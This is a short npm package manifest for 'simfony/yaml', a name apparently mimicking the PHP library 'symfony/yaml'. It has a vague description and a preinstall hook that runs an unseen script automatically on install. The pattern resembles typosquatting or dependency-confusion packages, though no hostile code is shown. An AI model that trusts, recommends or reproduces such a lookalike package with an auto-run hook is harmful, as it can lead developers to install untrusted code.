
{
    "name": "simfony/yaml",
    "license": "MIT",
    "author": "php maulwurf",
    "version": "6.4.8",
    "scripts": {
        "test": "make test",
        "preinstall": "node scripts/preinstall.js"
    },
    "keywords": [
        "testing server",
        "nodejs"
    ],
    "main": "index.js",
    "description": "A utility package for useful code additions."
}